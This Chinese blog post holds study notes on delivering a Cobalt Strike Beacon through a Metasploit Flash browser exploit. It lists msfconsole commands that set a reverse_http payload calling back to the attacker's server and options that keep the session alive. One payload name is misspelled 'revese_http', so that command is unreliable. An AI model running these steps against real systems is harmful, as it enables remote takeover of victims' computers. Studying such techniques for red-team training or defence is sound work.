CobaltStrike视频学习笔记系列:(九)Metasploit框架
0x00 客户端的漏洞利用
如果想使用MSF对目标进行漏洞利用,再通过这个漏洞来传输Beacon的话也可行。
1、首先在MSF上选择攻击模块
2、接着在MSF上设置Payload为windows/meterpreter/reverse_http或者windows/meterpreter/reverse_https,这么做是因为CS的Beacon与MSF的分阶段协议是相兼容的。
3、之后在MSF中设置Payload的LHOST、LPORT为CS中Beacon的监听器IP及端口。
4、然后设置 DisablePayloadHandler 为 True,此选项会让 MSF 避免在其内起一个 handler 来服务你的 payload 连接,也就是告诉MSF说我们已经建立了监听器,不必再新建监听器了。
5、再设置 PrependMigrate 为 True,此选项让 MSF 前置 shellcode 在另一个进程中运行 payload stager。如果被利用的应用程序崩溃或被用户关闭,这会帮助 Beacon 会话存活。
6、最后运行exploit -j,-j 是指作为job开始运行,即在后台运行。
0x01 操作
CS
在CS中新建一个HTTP Beacon,创建过程不再赘述,具体操作过程可参见之前第5节的学习笔记。
MSF
1、在MSF中选择攻击模块,根据教程这里选择的adobe_flash_hacking_team_uaf模块,不过个人感觉现在这个模块已经不太能被利用成功了。
- use exploit/multi/browser/adobe_flash_hacking_team_uaf
2、接着配置payload,这里选择revese_http payload
- set payload windows/meterpreter/revese_http
- set LHOST cs_server_ip
- set LPORT 80
3、之后,配置DisablePayloadHandler、PrependMigrate为 True
- set DisablePayloadHandler True
- set PrependMigrate True
4、最后,开始攻击。
- exploit -j
原创文章,作者: Admin ,转载请注明出处:https://secvery.com/516.html
评论列表(1条)
谢谢老哥分享